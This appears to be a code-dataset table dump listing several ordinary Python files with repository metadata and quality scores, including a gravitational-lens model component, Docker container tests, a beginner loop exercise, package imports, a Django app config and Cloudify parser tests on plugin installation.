max_stars_repo_path stringlengths 4 286 | max_stars_repo_name stringlengths 5 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.03M | content_cleaned stringlengths 6 1.03M | language stringclasses 111 values | language_score float64 0.03 1 | comments stringlengths 0 556k | edu_score float64 0.32 5.03 | edu_int_score int64 0 5 |
|---|---|---|---|---|---|---|---|---|---|---|
lenstronomywrapper/LensSystem/LensComponents/SIS.py | dangilman/LenstronomyWrapper | 0 | 6613951 | from lenstronomywrapper.LensSystem.LensComponents.macromodel_base import ComponentBase
class SISsatellite(ComponentBase):
def __init__(self, redshift, kwargs_init=None):
self._redshift = redshift
super(SISsatellite, self).__init__(self.lens_model_list,
[redshift], kwargs_init, None, True, True)
@property
def n_models(self):
return 1
def set_physical_location(self, x, y):
self.physical_x = x
self.physical_y = y
@property
def priors(self):
indexes = []
priors = []
for prior in self._prior:
idx = 0
indexes.append(idx)
priors.append(prior)
return indexes, priors
@property
def param_init(self):
return self.kwargs
@property
def param_sigma(self):
if self.reoptimize:
return [{'theta_E': 0.05, 'center_x': 0.05, 'center_y': 0.05}]
else:
return [{'theta_E': 0.3, 'center_x': 0.3, 'center_y': 0.3}]
@property
def param_lower(self):
lower = [{'theta_E': 0.001, 'center_x': -10, 'center_y': -10}]
return lower
@property
def param_upper(self):
upper = [{'theta_E': 3., 'center_x': 10, 'center_y': 10}]
return upper
@property
def lens_model_list(self):
return ['SIS']
@property
def redshift_list(self):
return [self._redshift] * len(self.lens_model_list)
| from lenstronomywrapper.LensSystem.LensComponents.macromodel_base import ComponentBase
class SISsatellite(ComponentBase):
def __init__(self, redshift, kwargs_init=None):
self._redshift = redshift
super(SISsatellite, self).__init__(self.lens_model_list,
[redshift], kwargs_init, None, True, True)
@property
def n_models(self):
return 1
def set_physical_location(self, x, y):
self.physical_x = x
self.physical_y = y
@property
def priors(self):
indexes = []
priors = []
for prior in self._prior:
idx = 0
indexes.append(idx)
priors.append(prior)
return indexes, priors
@property
def param_init(self):
return self.kwargs
@property
def param_sigma(self):
if self.reoptimize:
return [{'theta_E': 0.05, 'center_x': 0.05, 'center_y': 0.05}]
else:
return [{'theta_E': 0.3, 'center_x': 0.3, 'center_y': 0.3}]
@property
def param_lower(self):
lower = [{'theta_E': 0.001, 'center_x': -10, 'center_y': -10}]
return lower
@property
def param_upper(self):
upper = [{'theta_E': 3., 'center_x': 10, 'center_y': 10}]
return upper
@property
def lens_model_list(self):
return ['SIS']
@property
def redshift_list(self):
return [self._redshift] * len(self.lens_model_list)
| none | 1 | 2.080751 | 2 | |
test-containers/test_containers_from_command_line.py | kipoi/kipoi-containers | 0 | 6613952 | import os
from pathlib import Path
from kipoi_containers.updateoradd import DOCKER_TO_MODEL_JSON
from kipoi_containers.helper import populate_json, one_model_per_modelgroup
class TestContainers:
image_name = None
modelgroup_name = None
docker_to_model_dict = populate_json(DOCKER_TO_MODEL_JSON)
def test_parameters(self):
assert self.image_name not in [None, "kipoi-base-env"]
assert not self.modelgroup_name or (
self.modelgroup_name
and self.image_name not in [None, "kipoi-base-env"]
)
assert self.docker_to_model_dict != {}
def test_images(self, test_docker_image):
if self.modelgroup_name and self.image_name not in [
None,
"kipoi-base-env",
]:
if "slim" in self.image_name:
models = self.docker_to_model_dict.get(
self.image_name.replace("-slim", "")
)
else:
models = self.docker_to_model_dict.get(self.image_name)
if not models:
raise ValueError("Each model group must have one model")
for model in models:
if model.split("/")[0] in self.modelgroup_name:
print(f"Testing {model} with {self.image_name}")
test_docker_image(
model_name=model, image_name=self.image_name
)
if self.modelgroup_name != "DeepSEA":
break
elif self.image_name not in [None, "kipoi-base-env"]:
if "slim" in self.image_name:
models = self.docker_to_model_dict.get(
self.image_name.replace("-slim", "")
)
else:
models = self.docker_to_model_dict.get(self.image_name)
if "shared" in self.image_name:
models = one_model_per_modelgroup(models)
for model in models:
print(f"Testing {model} with {self.image_name}")
test_docker_image(model_name=model, image_name=self.image_name)
| import os
from pathlib import Path
from kipoi_containers.updateoradd import DOCKER_TO_MODEL_JSON
from kipoi_containers.helper import populate_json, one_model_per_modelgroup
class TestContainers:
image_name = None
modelgroup_name = None
docker_to_model_dict = populate_json(DOCKER_TO_MODEL_JSON)
def test_parameters(self):
assert self.image_name not in [None, "kipoi-base-env"]
assert not self.modelgroup_name or (
self.modelgroup_name
and self.image_name not in [None, "kipoi-base-env"]
)
assert self.docker_to_model_dict != {}
def test_images(self, test_docker_image):
if self.modelgroup_name and self.image_name not in [
None,
"kipoi-base-env",
]:
if "slim" in self.image_name:
models = self.docker_to_model_dict.get(
self.image_name.replace("-slim", "")
)
else:
models = self.docker_to_model_dict.get(self.image_name)
if not models:
raise ValueError("Each model group must have one model")
for model in models:
if model.split("/")[0] in self.modelgroup_name:
print(f"Testing {model} with {self.image_name}")
test_docker_image(
model_name=model, image_name=self.image_name
)
if self.modelgroup_name != "DeepSEA":
break
elif self.image_name not in [None, "kipoi-base-env"]:
if "slim" in self.image_name:
models = self.docker_to_model_dict.get(
self.image_name.replace("-slim", "")
)
else:
models = self.docker_to_model_dict.get(self.image_name)
if "shared" in self.image_name:
models = one_model_per_modelgroup(models)
for model in models:
print(f"Testing {model} with {self.image_name}")
test_docker_image(model_name=model, image_name=self.image_name)
| none | 1 | 2.332553 | 2 | |
codecademy/basic/for_loop.py | haozai309/hello_python | 0 | 6613953 | phrase = "A bird in the hand..."
# Add your for loop
for char in phrase:
if char is "A" or char is "a":
print "X",
else:
print char,
#Don't delete this print statement!
print | phrase = "A bird in the hand..."
# Add your for loop
for char in phrase:
if char is "A" or char is "a":
print "X",
else:
print char,
#Don't delete this print statement!
print | en | 0.927272 | # Add your for loop #Don't delete this print statement! | 4.382787 | 4 |
pyAitu/models/__init__.py | btsdigital/pyAitu | 11 | 6613954 | from .update import Update, QuickButtonSelected, InlineCommandSelected, Message, ContentType, FormClosed, \
FormSubmitted, FormMessageSent, MessageIdAssigned
from .media import Media, Contact, Audio, FileType
from .webhook import WebhookInfo, SetWebhook
from .command import InlineCommand, ReplyCommand, QuickButtonCommand, Command, UiState
from .form import SimpleCatalog, Item, ItemInfo, Options, Form, Header, TextArea, ValidationRule, FlexOptions, Button, \
FormAction, Submit, LabeledText, Divider, Image, FileMetadata, Text, Indent, Input, Currency, UserInfo,\
DatePicker, Checkbox, Switch, Radiogroup, CustomContainer, BottomBar, MediaPicker
from .constants import Alignment, Orientation, Currency, FileType, TextSize, TextStyle, OptionMediaType, InputType
from .peer.bot import Bot
__all__ = [
Bot,
Message,
ContentType,
Update,
QuickButtonSelected,
InlineCommandSelected,
Media,
Contact,
Audio,
InlineCommand,
ReplyCommand,
QuickButtonCommand,
Command,
UiState,
SimpleCatalog,
Item,
ItemInfo,
Options,
Form,
Header,
FormClosed,
TextArea,
LabeledText,
ValidationRule,
FlexOptions,
Button,
Alignment,
Orientation,
Currency,
FileType,
TextStyle,
TextSize,
OptionMediaType,
InputType,
FormSubmitted,
Submit,
FormAction,
FormMessageSent,
MessageIdAssigned,
Divider,
Image,
DatePicker,
MediaPicker,
FileMetadata,
Switch,
Text,
Indent,
Input,
Currency,
BottomBar,
Radiogroup,
CustomContainer,
Checkbox,
UserInfo,
WebhookInfo,
SetWebhook,
]
| from .update import Update, QuickButtonSelected, InlineCommandSelected, Message, ContentType, FormClosed, \
FormSubmitted, FormMessageSent, MessageIdAssigned
from .media import Media, Contact, Audio, FileType
from .webhook import WebhookInfo, SetWebhook
from .command import InlineCommand, ReplyCommand, QuickButtonCommand, Command, UiState
from .form import SimpleCatalog, Item, ItemInfo, Options, Form, Header, TextArea, ValidationRule, FlexOptions, Button, \
FormAction, Submit, LabeledText, Divider, Image, FileMetadata, Text, Indent, Input, Currency, UserInfo,\
DatePicker, Checkbox, Switch, Radiogroup, CustomContainer, BottomBar, MediaPicker
from .constants import Alignment, Orientation, Currency, FileType, TextSize, TextStyle, OptionMediaType, InputType
from .peer.bot import Bot
__all__ = [
Bot,
Message,
ContentType,
Update,
QuickButtonSelected,
InlineCommandSelected,
Media,
Contact,
Audio,
InlineCommand,
ReplyCommand,
QuickButtonCommand,
Command,
UiState,
SimpleCatalog,
Item,
ItemInfo,
Options,
Form,
Header,
FormClosed,
TextArea,
LabeledText,
ValidationRule,
FlexOptions,
Button,
Alignment,
Orientation,
Currency,
FileType,
TextStyle,
TextSize,
OptionMediaType,
InputType,
FormSubmitted,
Submit,
FormAction,
FormMessageSent,
MessageIdAssigned,
Divider,
Image,
DatePicker,
MediaPicker,
FileMetadata,
Switch,
Text,
Indent,
Input,
Currency,
BottomBar,
Radiogroup,
CustomContainer,
Checkbox,
UserInfo,
WebhookInfo,
SetWebhook,
]
| none | 1 | 1.120691 | 1 | |
fluctua_nft_backend/spotify/apps.py | denisgranha/fluctua_nft_backend | 1 | 6613955 | from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class SpotifyConfig(AppConfig):
name = "fluctua_nft_backend.spotify"
verbose_name = _("Spotify")
| from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class SpotifyConfig(AppConfig):
name = "fluctua_nft_backend.spotify"
verbose_name = _("Spotify")
| none | 1 | 1.357844 | 1 | |
src/tests/cloudify/test_plugins_to_install.py | tliron/aria-ng | 0 | 6613956 | #
# Copyright (c) 2016 GigaSpaces Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from dsl_parser.constants import DEPLOYMENT_PLUGINS_TO_INSTALL
from .suite import (ParserTestCase,
op_struct,
get_node_by_name)
class NodePluginsToInstallTest(ParserTestCase):
def test_no_duplicate_node_plugins_to_install_field_from_relationship(self): # NOQA
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
interfaces:
test_interface:
start:
implementation: test_plugin.start
inputs: {}
relationships:
- type: cloudify.relationships.my_relationship
target: test_node2
test_node2:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute: {}
plugins:
test_plugin:
executor: host_agent
source: dummy
relationships:
cloudify.relationships.my_relationship:
source_interfaces:
cloudify.interfaces.relationship_lifecycle:
postconfigure:
implementation: test_plugin.task.postconfigure
inputs: {}
"""
result = self.parse()
node = get_node_by_name(result, 'test_node1')
plugin = node['plugins_to_install'][0]
self.assertEquals('test_plugin', plugin['name'])
self.assertEquals(1, len(node['plugins_to_install']))
def test_node_plugins_to_install_field_from_relationship(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
relationships:
- type: cloudify.relationships.my_relationship
target: test_node2
test_node2:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute: {}
plugins:
test_plugin:
executor: host_agent
source: dummy
relationships:
cloudify.relationships.my_relationship:
source_interfaces:
cloudify.interfaces.relationship_lifecycle:
postconfigure:
implementation: test_plugin.task.postconfigure
inputs: {}
"""
# TODO issue #1 in test_plugins_to_install
result = self.parse()
node = get_node_by_name(result, 'test_node1')
plugin = node['plugins_to_install'][0]
self.assertEquals('test_plugin', plugin['name'])
self.assertEquals(1, len(node['plugins_to_install']))
def test_node_plugins_to_install_field(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute:
interfaces:
test_interface:
start:
implementation: test_plugin.start
inputs: {}
plugins:
test_plugin:
executor: host_agent
source: dummy
"""
result = self.parse()
plugin = result['nodes'][0]['plugins_to_install'][0]
self.assertEquals('test_plugin', plugin['name'])
self.assertEquals(1, len(result['nodes'][0]['plugins_to_install']))
def test_node_plugins_to_install_field_plugins_from_contained_nodes(self):
def get_plugin_to_install_from_node(node, plugin_name):
for plugin in node['plugins_to_install']:
if plugin['name'] == plugin_name:
return plugin
return None
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
test_node2:
type: test_type
relationships:
- type: cloudify.relationships.contained_in
target: test_node1
test_node3:
type: test_type2
relationships:
- type: cloudify.relationships.contained_in
target: test_node2
test_node4:
type: test_type
relationships:
- type: cloudify.relationships.contained_in
target: test_node3
node_types:
cloudify.nodes.Compute: {}
test_type:
interfaces:
test_interface:
start:
implementation: test_plugin.start
inputs: {}
test_type2:
interfaces:
test_interface2:
install:
implementation: test_plugin2.install
inputs: {}
relationships:
cloudify.relationships.contained_in: {}
plugins:
test_plugin:
executor: host_agent
source: dummy
test_plugin2:
executor: host_agent
source: dummy
"""
result = self.parse()
self.assertEquals(4, len(result['nodes']))
test_node2 = get_node_by_name(result, 'test_node2')
# TODO issue #2 in test_plugins_to_install
# ensuring non-host nodes don't have this field
self.assertTrue('plugins_to_install' not in test_node2)
test_node1 = get_node_by_name(result, 'test_node1')
test_plugin = get_plugin_to_install_from_node(test_node1, 'test_plugin')
test_plugin2 = get_plugin_to_install_from_node(test_node1, 'test_plugin2')
self.assertEquals('test_plugin', test_plugin['name'])
self.assertEquals('test_plugin2', test_plugin2['name'])
self.assertEquals(2, len(test_node1['plugins_to_install']))
def test_instance_relationships_target_node_plugins(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template.node_type_section()
self.template.node_template_section()
self.template += """
test_node2:
type: test_type
relationships:
- type: test_relationship
target: test_node
source_interfaces:
test_interface1:
install: test_plugin1.install
- type: test_relationship
target: test_node
target_interfaces:
test_interface1:
install: test_plugin2.install
relationships:
test_relationship: {}
plugins:
test_plugin1:
executor: central_deployment_agent
source: dummy
test_plugin2:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
self.assertEquals(2, len(result['nodes']))
test_node2 = get_node_by_name(result, 'test_node2')
self.assertEquals('test_node2', test_node2['id'])
self.assertEquals(2, len(test_node2['relationships']))
relationship1 = test_node2['relationships'][0]
self.assertEquals('test_relationship', relationship1['type'])
self.assertEquals('test_node', relationship1['target_id'])
rel1_source_ops = relationship1['source_operations']
self.assertEqual(
op_struct('test_plugin1', 'install',
executor='central_deployment_agent'),
rel1_source_ops['install'])
self.assertEqual(
op_struct('test_plugin1', 'install',
executor='central_deployment_agent'),
rel1_source_ops['test_interface1.install'])
self.assertEquals(2, len(rel1_source_ops))
self.assertEquals(8, len(relationship1))
plugin1_def = test_node2['plugins'][1]
self.assertEquals('test_plugin1', plugin1_def['name'])
relationship2 = test_node2['relationships'][1]
self.assertEquals('test_relationship', relationship2['type'])
self.assertEquals('test_node', relationship2['target_id'])
rel2_source_ops = relationship2['target_operations']
self.assertEqual(
op_struct('test_plugin2', 'install',
executor='central_deployment_agent'),
rel2_source_ops['install'])
self.assertEqual(
op_struct('test_plugin2', 'install',
executor='central_deployment_agent'),
rel2_source_ops['test_interface1.install'])
self.assertEquals(2, len(rel2_source_ops))
self.assertEquals(8, len(relationship2))
# expecting the other plugin to be under test_node rather than
# test_node2:
test_node1 = get_node_by_name(result, 'test_node')
plugin2_def = test_node1['plugins'][0]
self.assertEquals('test_plugin2', plugin2_def['name'])
class DeploymentPluginsToInstallTest(ParserTestCase):
def test_one_central_one_host_plugin_on_same_node(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute:
interfaces:
test_interface:
start:
implementation: test_plugin.start
inputs: {}
create:
implementation: test_management_plugin.create
inputs: {}
plugins:
test_plugin:
executor: host_agent
source: dummy
test_management_plugin:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
deployment_plugins = result['nodes'][0][DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
plugin = deployment_plugins[0]
self.assertEquals('test_management_plugin', plugin['name'])
# check the property on the plan is correct
deployment_plugins = result[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
def test_one_central_overrides_host_plugin(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_types:
test_type: {}
node_templates:
test_node1:
type: test_type
interfaces:
test_interface:
start:
implementation: test_plugin.start
executor: central_deployment_agent
plugins:
test_plugin:
executor: host_agent
source: dummy
"""
result = self.parse()
node = get_node_by_name(result, 'test_node1')
deployment_plugins = node[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
plugin = deployment_plugins[0]
self.assertEquals('test_plugin', plugin['name'])
# TODO issue #3 in test_plugins_to_install
self.assertIsNone(node.get('plugins_to_install'))
# check the property on the plan is correct
deployment_plugins = result[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
plugin = deployment_plugins[0]
self.assertEquals('test_plugin', plugin['name'])
def test_node_plugins_to_install_no_host(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Root
node_types:
cloudify.nodes.Root:
interfaces:
test_interface:
start:
implementation: cloud.server.start
inputs: {}
plugins:
cloud:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
self.assertEquals(1, len(result[DEPLOYMENT_PLUGINS_TO_INSTALL]))
def test_same_plugin_one_two_nodes(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
test_node2:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute:
interfaces:
test_interface:
start:
implementation: test_management_plugin.start
inputs: {}
plugins:
test_management_plugin:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
for node in result['nodes']:
deployment_plugins = node[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
plugin = deployment_plugins[0]
self.assertEquals('test_management_plugin', plugin['name'])
deployment_plugins = result[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
def test_two_plugins_on_one_node(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute:
interfaces:
test_interface:
start:
implementation: test_management_plugin1.start
inputs: {}
create:
implementation: test_management_plugin2.create
inputs: {}
plugins:
test_management_plugin1:
executor: central_deployment_agent
source: dummy
test_management_plugin2:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
deployment_plugins = result['nodes'][0][DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(2, len(deployment_plugins))
# TODO issue #4 in test_plugins_to_install
# check the property on the plan is correct
deployment_plugins = result[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(2, len(deployment_plugins))
def test_two_identical_plugins_on_node(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute:
interfaces:
test_interface:
start:
implementation: test_management_plugin.start
inputs: {}
create:
implementation: test_management_plugin.create
inputs: {}
plugins:
test_management_plugin:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
deployment_plugins = result['nodes'][0][DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
# check the property on the plan is correct
deployment_plugins = result[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins)) | #
# Copyright (c) 2016 GigaSpaces Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from dsl_parser.constants import DEPLOYMENT_PLUGINS_TO_INSTALL
from .suite import (ParserTestCase,
op_struct,
get_node_by_name)
class NodePluginsToInstallTest(ParserTestCase):
def test_no_duplicate_node_plugins_to_install_field_from_relationship(self): # NOQA
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
interfaces:
test_interface:
start:
implementation: test_plugin.start
inputs: {}
relationships:
- type: cloudify.relationships.my_relationship
target: test_node2
test_node2:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute: {}
plugins:
test_plugin:
executor: host_agent
source: dummy
relationships:
cloudify.relationships.my_relationship:
source_interfaces:
cloudify.interfaces.relationship_lifecycle:
postconfigure:
implementation: test_plugin.task.postconfigure
inputs: {}
"""
result = self.parse()
node = get_node_by_name(result, 'test_node1')
plugin = node['plugins_to_install'][0]
self.assertEquals('test_plugin', plugin['name'])
self.assertEquals(1, len(node['plugins_to_install']))
def test_node_plugins_to_install_field_from_relationship(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
relationships:
- type: cloudify.relationships.my_relationship
target: test_node2
test_node2:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute: {}
plugins:
test_plugin:
executor: host_agent
source: dummy
relationships:
cloudify.relationships.my_relationship:
source_interfaces:
cloudify.interfaces.relationship_lifecycle:
postconfigure:
implementation: test_plugin.task.postconfigure
inputs: {}
"""
# TODO issue #1 in test_plugins_to_install
result = self.parse()
node = get_node_by_name(result, 'test_node1')
plugin = node['plugins_to_install'][0]
self.assertEquals('test_plugin', plugin['name'])
self.assertEquals(1, len(node['plugins_to_install']))
def test_node_plugins_to_install_field(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute:
interfaces:
test_interface:
start:
implementation: test_plugin.start
inputs: {}
plugins:
test_plugin:
executor: host_agent
source: dummy
"""
result = self.parse()
plugin = result['nodes'][0]['plugins_to_install'][0]
self.assertEquals('test_plugin', plugin['name'])
self.assertEquals(1, len(result['nodes'][0]['plugins_to_install']))
def test_node_plugins_to_install_field_plugins_from_contained_nodes(self):
def get_plugin_to_install_from_node(node, plugin_name):
for plugin in node['plugins_to_install']:
if plugin['name'] == plugin_name:
return plugin
return None
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
test_node2:
type: test_type
relationships:
- type: cloudify.relationships.contained_in
target: test_node1
test_node3:
type: test_type2
relationships:
- type: cloudify.relationships.contained_in
target: test_node2
test_node4:
type: test_type
relationships:
- type: cloudify.relationships.contained_in
target: test_node3
node_types:
cloudify.nodes.Compute: {}
test_type:
interfaces:
test_interface:
start:
implementation: test_plugin.start
inputs: {}
test_type2:
interfaces:
test_interface2:
install:
implementation: test_plugin2.install
inputs: {}
relationships:
cloudify.relationships.contained_in: {}
plugins:
test_plugin:
executor: host_agent
source: dummy
test_plugin2:
executor: host_agent
source: dummy
"""
result = self.parse()
self.assertEquals(4, len(result['nodes']))
test_node2 = get_node_by_name(result, 'test_node2')
# TODO issue #2 in test_plugins_to_install
# ensuring non-host nodes don't have this field
self.assertTrue('plugins_to_install' not in test_node2)
test_node1 = get_node_by_name(result, 'test_node1')
test_plugin = get_plugin_to_install_from_node(test_node1, 'test_plugin')
test_plugin2 = get_plugin_to_install_from_node(test_node1, 'test_plugin2')
self.assertEquals('test_plugin', test_plugin['name'])
self.assertEquals('test_plugin2', test_plugin2['name'])
self.assertEquals(2, len(test_node1['plugins_to_install']))
def test_instance_relationships_target_node_plugins(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template.node_type_section()
self.template.node_template_section()
self.template += """
test_node2:
type: test_type
relationships:
- type: test_relationship
target: test_node
source_interfaces:
test_interface1:
install: test_plugin1.install
- type: test_relationship
target: test_node
target_interfaces:
test_interface1:
install: test_plugin2.install
relationships:
test_relationship: {}
plugins:
test_plugin1:
executor: central_deployment_agent
source: dummy
test_plugin2:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
self.assertEquals(2, len(result['nodes']))
test_node2 = get_node_by_name(result, 'test_node2')
self.assertEquals('test_node2', test_node2['id'])
self.assertEquals(2, len(test_node2['relationships']))
relationship1 = test_node2['relationships'][0]
self.assertEquals('test_relationship', relationship1['type'])
self.assertEquals('test_node', relationship1['target_id'])
rel1_source_ops = relationship1['source_operations']
self.assertEqual(
op_struct('test_plugin1', 'install',
executor='central_deployment_agent'),
rel1_source_ops['install'])
self.assertEqual(
op_struct('test_plugin1', 'install',
executor='central_deployment_agent'),
rel1_source_ops['test_interface1.install'])
self.assertEquals(2, len(rel1_source_ops))
self.assertEquals(8, len(relationship1))
plugin1_def = test_node2['plugins'][1]
self.assertEquals('test_plugin1', plugin1_def['name'])
relationship2 = test_node2['relationships'][1]
self.assertEquals('test_relationship', relationship2['type'])
self.assertEquals('test_node', relationship2['target_id'])
rel2_source_ops = relationship2['target_operations']
self.assertEqual(
op_struct('test_plugin2', 'install',
executor='central_deployment_agent'),
rel2_source_ops['install'])
self.assertEqual(
op_struct('test_plugin2', 'install',
executor='central_deployment_agent'),
rel2_source_ops['test_interface1.install'])
self.assertEquals(2, len(rel2_source_ops))
self.assertEquals(8, len(relationship2))
# expecting the other plugin to be under test_node rather than
# test_node2:
test_node1 = get_node_by_name(result, 'test_node')
plugin2_def = test_node1['plugins'][0]
self.assertEquals('test_plugin2', plugin2_def['name'])
class DeploymentPluginsToInstallTest(ParserTestCase):
def test_one_central_one_host_plugin_on_same_node(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute:
interfaces:
test_interface:
start:
implementation: test_plugin.start
inputs: {}
create:
implementation: test_management_plugin.create
inputs: {}
plugins:
test_plugin:
executor: host_agent
source: dummy
test_management_plugin:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
deployment_plugins = result['nodes'][0][DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
plugin = deployment_plugins[0]
self.assertEquals('test_management_plugin', plugin['name'])
# check the property on the plan is correct
deployment_plugins = result[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
def test_one_central_overrides_host_plugin(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_types:
test_type: {}
node_templates:
test_node1:
type: test_type
interfaces:
test_interface:
start:
implementation: test_plugin.start
executor: central_deployment_agent
plugins:
test_plugin:
executor: host_agent
source: dummy
"""
result = self.parse()
node = get_node_by_name(result, 'test_node1')
deployment_plugins = node[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
plugin = deployment_plugins[0]
self.assertEquals('test_plugin', plugin['name'])
# TODO issue #3 in test_plugins_to_install
self.assertIsNone(node.get('plugins_to_install'))
# check the property on the plan is correct
deployment_plugins = result[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
plugin = deployment_plugins[0]
self.assertEquals('test_plugin', plugin['name'])
def test_node_plugins_to_install_no_host(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Root
node_types:
cloudify.nodes.Root:
interfaces:
test_interface:
start:
implementation: cloud.server.start
inputs: {}
plugins:
cloud:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
self.assertEquals(1, len(result[DEPLOYMENT_PLUGINS_TO_INSTALL]))
def test_same_plugin_one_two_nodes(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
test_node2:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute:
interfaces:
test_interface:
start:
implementation: test_management_plugin.start
inputs: {}
plugins:
test_management_plugin:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
for node in result['nodes']:
deployment_plugins = node[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
plugin = deployment_plugins[0]
self.assertEquals('test_management_plugin', plugin['name'])
deployment_plugins = result[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
def test_two_plugins_on_one_node(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute:
interfaces:
test_interface:
start:
implementation: test_management_plugin1.start
inputs: {}
create:
implementation: test_management_plugin2.create
inputs: {}
plugins:
test_management_plugin1:
executor: central_deployment_agent
source: dummy
test_management_plugin2:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
deployment_plugins = result['nodes'][0][DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(2, len(deployment_plugins))
# TODO issue #4 in test_plugins_to_install
# check the property on the plan is correct
deployment_plugins = result[DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(2, len(deployment_plugins))
def test_two_identical_plugins_on_node(self):
self.template.version_section('cloudify_dsl', '1.0')
self.template += """
node_templates:
test_node1:
type: cloudify.nodes.Compute
node_types:
cloudify.nodes.Compute:
interfaces:
test_interface:
start:
implementation: test_management_plugin.start
inputs: {}
create:
implementation: test_management_plugin.create
inputs: {}
plugins:
test_management_plugin:
executor: central_deployment_agent
source: dummy
"""
result = self.parse()
deployment_plugins = result['nodes'][0][DEPLOYMENT_PLUGINS_TO_INSTALL]
self.assertEquals(1, len(deployment_plugins))
# check the property on the plan is correct
deployment_plugins = result[DEPLOYMENT_PLUGINS_TO_INSTALL]
